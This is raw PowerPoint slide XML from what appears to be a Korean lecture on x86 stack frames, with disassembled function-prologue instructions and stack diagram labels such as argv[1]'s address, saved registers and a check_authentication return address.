              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="25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0x08048479 &lt;+5&gt;:	sub    $0x1c,%esp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0x0804847c &lt;+8&gt;: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0x08048483 &lt;+15&gt;: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0x0804848a &lt;+22&gt;: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$0x0,-0x18(%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0x08048491 &lt;+29&gt;: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$0x0,-0x14(%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0x08048498 &lt;+36&gt;:	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$0x0,-0x10(%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0x0804849f &lt;+43&gt;:	mov    0x8(%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),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax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0x080484a2 &lt;+46&gt;:	mov    %eax,0x4(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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1647AE-AFA5-FF47-92F3-8311924BA9BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621517" y="551793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(main)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06606" y="3244334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506606" y="1681367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B08799-3689-3C45-A8D2-C5D09121E9DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621516" y="4868371"/>
            <a:ext cx="2648607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60A34-4EBF-BD4A-AFE9-415A183E5AF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621515" y="421881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365537-5BB6-3545-942E-3CE4F268D9EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10287000" y="409903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atin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>주소값</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Monac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CB35-B53B-0A49-8D6A-3DF87912E169}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8899634" y="470761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C4128-4C39-A24A-838C-5B5742E4B5EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6840387" y="4393901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Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>주소값</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ko-KR" altLang="en-US" dirty="0">
              <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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69F16E-0F17-E442-A278-52755C3C4580}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621514" y="357866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71700-B61E-684E-828D-8947F11278EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621513" y="3620525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	%</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR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( </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>check_authentication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리턴주소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A8DFE-8EA2-9749-8FCF-18A15D0BD5DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621514" y="292910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check_auth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423F4-D4E4-5440-88D6-59F99253F98A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621514" y="2276120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edi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B4472-EEE3-AB4F-AC85-D890C5ABC7D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6621514" y="162313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esi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59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8355724" cy="6467036"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit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ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x08048474 &lt;+0&gt;:	push   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0x08048475 &lt;+1&gt;:	mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%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500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   0x08048477 &lt;+3&gt;:	push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi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500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500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0x08048478 &lt;+4&gt;:	push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x08048479 &lt;+5&gt;:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>sub    $0x1c,%esp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0x0804847c &lt;+8&gt;:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x0,-0xc(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)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0x08048483 &lt;+15&gt;:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x0,-0x1c(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)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0x0804848a &lt;+22&gt;:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x0,-0x18(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)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0x08048491 &lt;+29&gt;:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x0,-0x14(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)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0x08048498 &lt;+36&gt;:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   $0x0,-0x10(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)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0x0804849f &lt;+43&gt;:	mov    0x8(%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),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax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0x080484a2 &lt;+46&gt;:	mov    %eax,0x4(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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53905" y="5798159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317416" y="89056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A8DFE-8EA2-9749-8FCF-18A15D0BD5DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668813" y="5482934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check_auth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423F4-D4E4-5440-88D6-59F99253F98A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668813" y="48299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edi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B4472-EEE3-AB4F-AC85-D890C5ABC7D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668813" y="4176956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esi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85B827-2DD9-394C-A83B-2BD8EF5EA0DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668812" y="3525682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8407-4AEC-F440-BDAA-E21825577F0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668811" y="2872693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F9A6BB-326D-1341-9D2F-7E19750216D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668810" y="222141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C42A-DE46-F54C-BF11-D02790E8B74B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668809" y="15701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14BA2-A3F1-6142-AE4A-7E7C892B9B1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="3665796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7214B-54B8-A541-936E-00C94CB5CFD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="300753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$0x10(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AC86B-20F8-8142-BDC2-F9806A32682B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="2349280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$0x14(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CF65C-4170-E54A-8D14-FBF353517D09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="1691022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$0x18(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EBEA9A-7766-BD4F-9963-9C3C8E954DDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668809" y="91887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B329E-41D7-6C47-9B16-E72E0FADA509}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="103974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7351FF-C001-2A4F-B221-AEBBCD4FA9B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668809" y="526747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742896-0EA4-2C45-801D-24207C129859}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668809" y="117125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530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8355724" cy="6467036"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit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ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x08048474 &lt;+0&gt;:	push   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0x08048475 &lt;+1&gt;:	mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,%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500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   0x08048477 &lt;+3&gt;:	push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>edi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500" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500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0x08048478 &lt;+4&gt;:	push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esi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0x08048479 &lt;+5&gt;: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>
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>sub    $0x1c,%esp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0x0804847c &lt;+8&gt;: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0x08048483 &lt;+15&gt;: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0x0804848a &lt;+22&gt;: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$0x0,-0x18(%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0x08048491 &lt;+29&gt;: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$0x0,-0x14(%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0x08048498 &lt;+36&gt;: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$0x0,-0x10(%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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>0x0804849f &lt;+43&gt;: mov    0x8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>eax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0x080484a2 &lt;+46&gt;:	mov    %eax,0x4(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1500" dirty="0">
              <a:latin typeface="Monac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53905" y="5798159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325300" y="84511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A8DFE-8EA2-9749-8FCF-18A15D0BD5DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668813" y="5482934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check_auth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423F4-D4E4-5440-88D6-59F99253F98A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668813" y="48299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edi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B4472-EEE3-AB4F-AC85-D890C5ABC7D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668813" y="4176956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esi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85B827-2DD9-394C-A83B-2BD8EF5EA0DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668812" y="3525682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8407-4AEC-F440-BDAA-E21825577F0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668811" y="2872693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F9A6BB-326D-1341-9D2F-7E19750216D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668810" y="222141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C42A-DE46-F54C-BF11-D02790E8B74B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668809" y="15701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14BA2-A3F1-6142-AE4A-7E7C892B9B1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="3665796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7214B-54B8-A541-936E-00C94CB5CFD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="300753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$0x10(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AC86B-20F8-8142-BDC2-F9806A32682B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="2349280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$0x14(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CF65C-4170-E54A-8D14-FBF353517D09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="1691022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$0x18(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EBEA9A-7766-BD4F-9963-9C3C8E954DDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668809" y="91887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B329E-41D7-6C47-9B16-E72E0FADA509}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9317416" y="103974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7351FF-C001-2A4F-B221-AEBBCD4FA9B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668809" y="526747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742896-0EA4-2C45-801D-24207C129859}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668809" y="117125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292EB-4EE7-054C-B5B8-B51DC7AF8B43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10287000" y="413640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atin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Monaco" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ko-KR" altLang="en-US" sz="2000" dirty="0" err="1">
